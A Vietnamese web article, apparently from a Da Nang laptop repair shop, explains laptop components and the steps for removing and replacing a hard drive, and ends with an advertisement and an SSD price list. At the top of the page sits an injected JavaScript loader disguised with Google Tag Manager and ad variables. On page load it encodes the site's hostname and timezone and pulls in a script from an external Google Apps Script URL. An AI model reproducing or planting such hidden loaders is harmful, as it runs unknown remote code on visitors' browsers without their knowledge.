var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Đừng bỏ lỡ cách thay ổ cứng laptop dell hàng đầu 2023

Cách tháo ổ cứng laptop tưởng chừng đơn giản nhưng cũng gây ra không ít phiền phức cho người dùng máy tính. Tháo ổ cứng laptop là thao tác quan trọng để bạn có thể tiến hành thay ổ cứng cho máy. Tuy nhiên quá trình này đòi hỏi bạn cần phải có một chút khéo léo cũng như cẩn trọng khi làm việc. Vậy bạn cần biết gì khi thực hiện các cách tháo ổ cứng laptop? Cùng theo dõi bài viết sau đây để hiểu rõ hơn bạn nhé!

Cách tháo ổ cứng laptop

Vì sao bạn cần thay ổ cứng laptop?

Thay ổ cứng laptop là một trong những dịch vụ mà nhiều khách hàng quan tâm khi ổ cứng bị hỏng hay cần nâng cấp ổ cứng laptop để máy chạy nhanh hơn, mượt mà hơn. Thay ổ cứng laptop mang đến cho người dùng máy tính nhiều lợi ích như:

 • Tăng tốc độ của máy tính, giúp máy chạy nhanh hơn
 • Tốc độ đọc, ghi dữ liệu cũng tăng lên nhiều hơn
 • Các dữ liệu trên máy tính của người dùng cũng sẽ được bảo vệ ổn định hơn
 • Bên cạnh đó, nếu bạn chọn thay ổ cứng laptop khi nó bị hỏng sẽ giúp bạn duy trì được hoạt động ổn định của hệ thống máy tính.
Vì sao bạn cần thay ổ cứng laptop?

Cấu tạo chi tiết của laptop

Trước khi thực hiện cách tháo ổ cứng laptop an toàn thì bạn cần phải nắm rõ được cấu tạo chi tiết của laptop như thế nào. Từ đó bạn mới có thể hiểu hết được từng bộ phận để không gặp phải sự cố bị bể, hư hỏng các bộ phận liên quan khi tháo ổ cứng. Đồng thời bạn cũng sẽ biết được vị trí chính xác của chiếc ổ cứng đang nằm ở đâu.

Xem thêm: 1 số cách khắc phục ổ cứng kêu tít tít

Cấu tạo bên ngoài của laptop

Thông thường, bên ngoài laptop sẽ gồm các bộ phận như: vỏ laptop, bàn phím, màn hình, touchpad, pin, cổng kết nối, sạc,…

Vỏ laptop: Đây là bộ phận bên ngoài của laptop giúp bảo vệ máy tránh khỏi các tác động của các yếu tố xung quanh. Vỏ laptop thường sẽ được làm từ nhựa hoặc hợp kim cao cấp như nhôm, magie, lớp phủ sợi carbon,… Vậy nên khi mở bạn nên cẩn thận kẻo bể, nứt.

Bàn phím: Là một trong những bộ phận quan trọng mà bạn không thể bỏ qua vì bạn cần sử dụng nó mỗi khi dùng laptop.

Cấu tạo bên ngoài của laptop

Màn hình: Laptop có đa dạng các loại màn hình khác nhau tuỳ vào dòng máy, hãng sản xuất, mục đích sử dụng cũng như kích thước máy ra sao. Thường thì màn hình laptop sẽ có giao động từ 10 đến 17.3 inch.

Touchpad: Chuột cảm ứng laptop cũng đa dạng về kích thước, độ rộng, phạm vi,… tùy vào thiết kế của nhà sản xuất ở từng mẫu laptop, một số loại còn có nút cơ. Vậy nên bạn cũng cần biết để khi thực hiện các cách tháo ổ cứng laptop cũng không gây ảnh hưởng nhiều đến máy.

Pin: 3 cell, 4 cell, 6 cell, 8 cell, 9 cell là các loại được dùng phổ biến.

Cấu tạo bên trong của laptop

Bên trong của một chiếc laptop thông thường sẽ có các bộ phận sau đây: bộ vi xử lý – CPU, card màn hình – VGA, bộ xử lý đồ hoạ – GPU, bộ nhớ tạm thời – Ram, ổ cứng lưu trữ, mainboard, chip set, card kết nối wifi, board cao áp, ổ đĩa quang.

Cấu tạo bên trong của laptop

Bộ vi xử lý – CPU: thông thường bộ vi xử lý sẽ được gắn trực tiếp vào mainboard. Đây chính là trung tâm xử lý và phân tích dữ liệu đầu não của laptop nên nó đóng vai trò quan trọng không kém.

Card màn hình – VGA: Là thiết bị chuyển tiếp qua lại giữa màn hình và mainboard laptop. Bộ phận này có trách nhiệm xử lý tất cả những dữ liệu, thông tin liên quan đến hình ảnh, video như màu sắc, độ sáng, độ phân giải,… trước khi hiển thị trên màn hình.

Bộ xử lý đồ hoạ – GPU: Đây chính là bộ xử lý chính của màn hình.

Mainboard: Bạn có thể nhận biết được vị trí này khi thấy nó được đặt ngay phía dưới bàn phím. Mainboard được xem là nền móng để gắn kết tất cả các linh kiện và thiết bị ngoại vi như: RAM, CPU, ổ cứng, card màn hình, Pin,… lại với nhau thành một khối thống nhất.

Ổ cứng: Khi cần thực hiện cách tháo ổ cứng laptop thì ổ cứng nằm ở vị trí nào cũng là điều hết sức quan trọng mà bạn cần quan tâm. Đây là nơi để bạn có thể lưu trữ và truy xuất dữ liệu…

Cách tháo ổ cứng laptop

Ổ đĩa quang laptop: Bạn có thể tháo ra dễ dàng vì bộ phận này thường được trang bị phía cạnh của laptop. Tuy nhiên các dòng laptop hiện đại với thiết kế siêu mỏng nhẹ thường cắt giảm bớt bộ phận này vì không thiết yếu.

Khi nào người dùng cách thực hiện cách tháo ổ cứng laptop?

Tuỳ thuộc vào nhu cầu sử dụng của người dùng cũng như tình trạng của ổ cứng như thế nào mà bạn có thể lựa chọn được thời điểm thích hợp để thay thế hay nâng cấp ổ cứng laptop. Bạn có thể lựa chọn thực hiện cách tháo ổ cứng laptop để nâng cấp hoặc thay thế trong các trường hợp sau:

 • Ổ cứng HDD cũ, có tiếng ồn phát ra khi máy hoạt động và nhanh bị nóng
 • Ổ cứng của máy tính xuất hiện các lỗi như: ‘Bad sector’, ‘Non-system disk or disk error…’
 • Người dùng không thể cài đặt bất cứ ứng dụng hoặc hệ điều hành nào do ổ cứng laptop bị rung lắc dẫn tới bề mặt đĩa bị ma sát với kim từ quá mạnh, gây lỗi và mất dữ liệu hệ điều hành
 • Ổ cứng laptop bị hỏng, không thể khởi động được và khi đó máy tính cũng không thể nạp hệ điều hành khi mở máy
 • Tốc độ xử lý dữ liệu và khởi động máy bị chậm.
Khi nào người dùng cách thực hiện cách tháo ổ cứng laptop?

Hướng dẫn cách tháo ổ cứng laptop

Cách tháo ổ cứng laptop được thực hiện tương đối dễ dàng nhưng đòi hỏi người dùng cần có những kỹ thuật cơ bản nhất. Dưới đây sẽ là hướng dẫn cách tháo và thay ổ cứng laptop đơn giản nhất dành cho bạn để bạn dễ dàng hơn trong việc tháo ổ cứng.

Tham khảo bài viết: Thay ổ cứng SSD cho laptop Dell inspiron 15

Cách thay ổ cứng được thực hiện như sau:

Bước 1: Tháo laptop nhẹ nhàng, cẩn thận

Đầu tiên bạn hãy dùng tua vít để tháo hết ốc ở mặt dưới vỏ laptop. Bạn cần nhớ rõ các vị trí của ốc để khi lắp vào không bị nhầm lẫn. Sau đó bạn hãy dùng dụng cụ mỏng cắm vào khe hở giữa nắp và thân máy. Tiếp theo bạn hãy kéo dọc đường viền giữa nắp khớp với thân máy để mở rồi nhẹ nhàng tháo vỏ laptop ra.

Bước 2: Kiểm tra linh kiện

Đây được xem là bước đi quan trọng trong quá trình thực hiện cách tháo ổ cứng laptop của bạn. Kiểm tra các linh kiện laptop nhằm giúp bạn có thể biết được tình trạng của các linh kiện này như thế nào. Bạn có thể kiểm tra các linh kiện như: pin, card wifi, 2 quạt tản nhiệt, CPU, GPU, jack tháo chuột và tháo bàn phím, pin CMOS, dãy jack cắm USB và HDMI, 2 ổ cứng SSD và HDD.

Bước 2: Kiểm tra linh kiện

Bước 3: Tiến hành cách tháo ổ cứng laptop

Bây giờ sẽ là lúc bạn thực hiện cách tháo ổ cứng laptop một cách an toàn và hiệu quả nhất.

Trước hết, bạn hãy tháo dây pin laptop ra rồi tháo ốc của ổ cứng SSD sau đó bạn hãy rút SSD ra khỏi máy. Như vậy là bạn đã có thể thực hiện cách tháo ổ cứng laptop ra khỏi máy một cách nhanh chóng mà không sợ bị hư hỏng các linh kiện khác.

Bước 3: Tiến hành cách tháo ổ cứng laptop

Từ các chia sẻ trên, có lẽ bạn cũng nhận ra được rằng để có thể tháo được ổ cứng ra khỏi laptop thì các bước 1 và bước 2 vô cùng quan trọng và không thể thiếu. Các thao tác trên cũng được áp dụng tương tự cho cách lắp ổ cứng SSD vào máy tính. Nếu bạn muốn nâng cấp ổ cứng bạn có thể thực hiện tiếp bước sau:

Bước 4: Lắp ổ cứng vào máy tính

Bạn hãy chọn một ổ cứng SSD mới phù hợp với dòng laptop mà mình đang sử dụng, sau đó lắp ổ cứng vào máy. Rồi bạn hãy vặn ốc cố định SSD mới để ổ cứng không bị lệch vị trí.

Bước 4: Lắp ổ cứng vào máy tính

Bước 5: Lắp laptop lại như ban đầu

Ở bước này bạn hãy lắp lại tất cả các bộ phận của laptop như ban đầu theo đúng vị trí cũng như trình tự của máy.

Bước 5: Lắp laptop lại như ban đầu

Địa chỉ nâng cấp ổ cứng chất lượng cao

Nếu bạn đang có nhu cầu nâng cấp ổ cứng SSD cho laptop thì bạn có thể đến với cửa hàng sửa chữa Laptop Minh Khoa tại 155 Hàm Nghi, Đà Nẵng để được tư vấn và hỗ trợ tốt nhất. Tại cửa hàng, có sẵn kho linh kiện laptop với hơn 1000+ sản phẩm khác nhau sẽ mang đến cho khách hàng nhiều dòng ổ cứng laptop chính hãng, chất lượng cao để đáp ứng được nhu cầu ngày càng đa dạng của quý khách.

Thế mạnh của Laptop Minh Khoa

Dưới đây là một số loại ổ cứng có tại Laptop Minh Khoa và mức giá đi kèm quý khách hàng có thể tham khảo:

Dung lượng ổ cứng Khoảng giá Bảo hành Giá ổ cứng SSD 120GB 690.000Đ – 950.000Đ 24 tháng Giá ổ cứng laptop SSD 128GB 699.000Đ – 950.000Đ 24 tháng Giá ổ cứng SSD 240GB 999.000Đ – 1.150.000Đ 24 tháng Giá ổ cứng SSD 256GB 999.000Đ – 1.450.000Đ 24 tháng Giá ổ cứng cho laptop SSD 480GB 1.850.000Đ 24 tháng Giá ổ cứng laptop 500GB SSD 2.250.000Đ 24 tháng Giá ổ cứng SSD 512GB 1.750.000Đ – 2.950.000Đ 24 tháng Giá ổ cứng SSD cho laptop 1TB 3.250.000Đ 24 tháng

Trên đây chính là một số thông tin bạn cần biết về cách tháo ổ cứng laptop để bạn hiểu rõ hơn và áp dụng được suôn sẻ nhất. Hy vọng qua bài viết này bạn sẽ hiểu rõ hơn về quá trình tháo ổ cứng cũng như thay ổ cứng mới của laptop được diễn ra như thế nào. Hãy đến với cửa hàng sửa chữa Laptop Minh Khoa để được trải nghiệm những dịch vụ tốt nhất tại cửa hàng bạn nhé!

Bài viết liên quan

 • Địa chỉ bán ổ cứng cho laptop uy tín hàng đầu tại Đà Nẵng
 • Hiện ổ cứng bị ẩn trong win 7 đơn giản
 • Cách chạy 2 ổ cứng song song hiệu quả nhất